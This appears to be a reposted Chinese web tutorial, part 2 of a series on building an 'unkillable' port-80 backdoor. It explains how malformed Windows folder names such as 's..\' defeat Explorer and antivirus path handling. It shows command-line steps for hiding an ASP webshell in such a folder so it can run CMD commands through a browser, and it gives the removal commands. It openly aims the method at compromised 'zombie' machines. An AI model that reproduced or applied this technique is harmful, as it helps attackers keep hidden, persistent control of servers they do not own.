当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > 建造永不被杀的80端口后门(2)

安全防护
服务器安全设置(十六)
服务器安全设置(十七)
服务器安全设置(十八)
服务器安全设置(十九)
服务器安全设置(二十)
服务器安全设置(二十一)
服务器安全设置(二十二)
Windows Server 2003 虚拟主机的安全配置
Win2000 Server入侵监测
Web服务器的安全和攻击防范 (一)
Web服务器的安全和攻击防范 (二)
Web服务器的安全和攻击防范 (三)
Web服务器的安全和攻击防范 (四)
Web服务器的安全和攻击防范 (五)
安全配置和维护Apache WEB Server (上)
安全配置和维护Apache WEB Server (下)
安全性与IIS (一)
安全性与IIS (二)
安全性与IIS (三)
安全性与IIS (四)

安全防护 中的 建造永不被杀的80端口后门(2)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 59 ::
收藏到网摘: n/a

为什么会这样?我们先说你看到的这个“S.”文件夹,他即不能打开也不能删除,不能打开是因为他的实际路径是“c:\winnt\system32\myhome\s..\”(我们自己创建的所以可以确定他的实际路径)但是在Windows资源管理器中名字变成了“S.”也就是说当你试图打开它的时候Windows实际上尝试打开“c:\winnt\system32\myhome\s.\”当然是不能打开的,文件并不存在,所以Windows会报错。不能删除也是因为这个,Windows把一个实际存在的文件路径错误的解析为一个不存在的路径,并进行xx作当然是无法完成的。
该说“S..”这个文件了,这个文件可以打开,但是却无法删除。等等……打开?你以为Windows真的是打开了我们创建的“s...\”文件了吗?我们做下面的试验你就明白了。还是老规矩{}是我的注释方便大家理解:
----------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

c:\winnt\system32\myhome>copy net.asp s..\ {复制刚刚你的asp的木马文件到“s..\”,资源管理器的“S.”}
已复制 1 个文件。

c:\winnt\system32\myhome>

----------------------------------------------

现在回到你的资源管理器打开“S.”文件夹,你看到了什么?“net.asp”文件怎么会在这里?我们刚刚的确复制到了“S.”呀?难道我们打开“S.”文件夹实际上就是打开了“S”?不错事实就是这样。其实如果你再创建一个“S”文件夹的话“S.”就能打开了,但是实际上打开的是“S”。

这是关键的话题了,其实我们就利用S.目录不被杀的目的来隐藏我们的木马,不管木马都毒,可是一般来说的exe文件不能在s.这样的目录下运行的,但是asp木马却可以!可以通过浏览来执行CMD命令,把net.asp复制到s.目录后,把net.asp删了,我们在浏览器http://127.0.0.1/kiss/kiss/s../net.asp 就可以看到浏览得asp木马了到了,一般用户根本不可能发现他,就算专业级的杀毒软件也只会去杀“s”而跳过“s..\”,好了那就说一下删除方法吧

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

F:\Test>dir
驱动器 F 中的卷是 BGTING
卷的序列号是 2C8E-FE1C

F:\Test 的目录

2003-09-11 17:50 .
2003-09-11 17:50 ..
2003-09-11 18:35 s.
2003-09-11 18:37 s..
1 个文件 9 字节
5 个目录 3,390,029,824 可用字节

c:\winnt\system32\myhome>rmdir s..\
目录不是空的。

c:\winnt\system32\myhome>rmdir s..\ /s
s..\, 是否确认(Y/N)? y

c:\winnt\system32\myhome>rmdir s...\ /s
s...\, 是否确认(Y/N)? y

这也不用担心搞坏你肉鸡了,好了这样一个很隐蔽的后门就建立了,而且不被杀,如果在肉鸡,上述要在3389进行测试通过的。